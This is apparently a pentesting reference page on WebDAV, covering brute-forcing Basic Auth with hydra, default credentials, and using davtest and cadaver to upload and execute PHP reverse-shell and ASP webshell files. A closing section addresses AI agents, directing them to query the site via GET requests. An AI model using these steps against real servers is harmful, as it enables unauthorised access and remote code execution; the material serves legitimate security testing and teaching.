# WebDAV

## Theory

WebDAV is a set of extensions to the Hypertext Transfer Protocol, which allows user agents to collaboratively author contents directly in an HTTP web server. Usually, to **connect** a WebDav server you will need valid **credentials.**

## Practice

{% hint style="info" %}
On Windows, users can also access and mount WebDAV shares via UNC paths, such as `\\10.37.129.2@80\example_webdav_folder`.
{% endhint %}

### Brute-force (HTTP Basic Auth)

{% tabs %}
{% tab title="hydra" %}
WebDAV usually require valid credentials using HTTP Basic Auth. You may bruteforce it using [hydra](https://github.com/vanhauser-thc/thc-hydra)

```bash
hydra -L users.txt -P passwords.txt example.domain.local http-get /webdavDirectory/
```

{% hint style="info" %}
Default credentials are **`wampp:xampp`**
{% endhint %}
{% endtab %}
{% endtabs %}

### Upload a shell

{% tabs %}
{% tab title="Davtest" %}
**Davtest** will try to upload several files with different extensions and check if the extension is executed:

```bash
# Test and cleanup
davtest -url http://example.com/davdir -auth 'user:pass' -cleanup

#Uplaod .txt files and try to move it to other extensions
davtest -url http://example.com/davdir -auth 'user:pass' -cleanup -move 
```

If we can upload the file e.g. PHP file, upload the script for reverse shell.

```bash
davtest -url http://example.com/davdir -auth 'user:pass' -uploadfile shell.php -uploadloc shell.php
```

Then we can navigate to <http://example.com/davdir/shell.php> to execute it.
{% endtab %}

{% tab title="Cadaver" %}
You can use this tool to **connect to the WebDav** server and perform actions (like **upload**, **move** or **delete**) **manually**.

```bash
$ cadaver http://example.com/davdir
Username: bob
Password: 
dav:/davdir/> put /usr/share/webshells/asp/webshell.asp
```

Then we can navigate to <http://example.com/davdir/webshell.asp> to execute it.
{% endtab %}
{% endtabs %}

## Resources

{% embed url="<https://exploit-notes.hdks.org/exploit/web/webdav-pentesting/>" %}

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/put-method-webdav>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://red.infiltr8.io/network-pentesting/protocols/webdav.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.